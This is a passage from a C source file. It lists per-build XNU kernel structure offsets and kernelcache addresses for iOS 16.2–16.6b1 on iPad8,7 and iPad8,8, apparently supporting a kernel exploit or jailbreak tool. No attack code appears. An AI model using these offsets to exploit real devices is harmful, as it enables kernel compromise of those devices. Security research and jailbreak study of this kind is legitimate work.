._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,8 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,8", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,8", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,8", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev 